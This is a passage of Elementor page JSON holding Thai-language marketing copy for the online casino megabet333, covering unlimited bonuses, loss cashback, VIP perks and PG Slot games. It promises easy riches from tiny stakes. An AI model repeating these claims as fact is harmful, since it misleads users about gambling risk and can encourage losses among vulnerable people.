\\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot 